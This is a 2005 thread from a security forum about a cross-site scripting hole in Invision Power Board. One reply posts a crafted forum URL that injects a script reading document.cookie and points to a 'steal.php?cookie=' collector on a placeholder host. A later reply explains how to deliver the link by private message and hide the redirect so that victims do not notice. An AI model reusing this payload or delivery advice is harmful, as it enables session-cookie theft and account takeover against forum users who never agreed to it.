IT Security and Insecurity Portal

new xss in Invision Power Board

Posted: Sat Jul 09, 2005 11:10 pm

any2000
Active user
Joined: Dec 02, 2004
Posts: 26

Posted: Wed Aug 03, 2005 12:41 am

Matt
Regular user
Joined: Jul 30, 2005
Posts: 7

All that script does is show your own cookie.
For it to work you'd need to get someone else's cookie.

Posted: Fri Aug 05, 2005 1:26 pm

sygma
Regular user
Joined: Nov 21, 2004
Posts: 7

[code]www.xxx.com/forums/index.php?act=idx='>http://www.xxx.com/steal.php?cookie=[/color]<script>alert(document.cookie)</script>
better?

_________________ [i]no word to save thee[/i]

Posted: Tue Sep 20, 2005 1:48 pm

super
Active user
Joined: Sep 19, 2005
Posts: 30

Where do I put this? In the URL bar?

Posted: Tue Sep 20, 2005 5:10 pm

marlboro3
Beginner
Joined: Sep 11, 2005
Posts: 2

No.
Well, what works best is a private message. One way to not scare the reader with the redirection is to redirect in his message window and delete the crafted message.
Works 100%, some don't even notice the redir.

Posted: Tue Sep 20, 2005 7:57 pm

super
Active user
Joined: Sep 19, 2005
Posts: 30

I don't understand clearly, please reply with details, pleaseee

www.waraxe.us Forum Index -> Cross-site scripting aka XSS
All times are GMT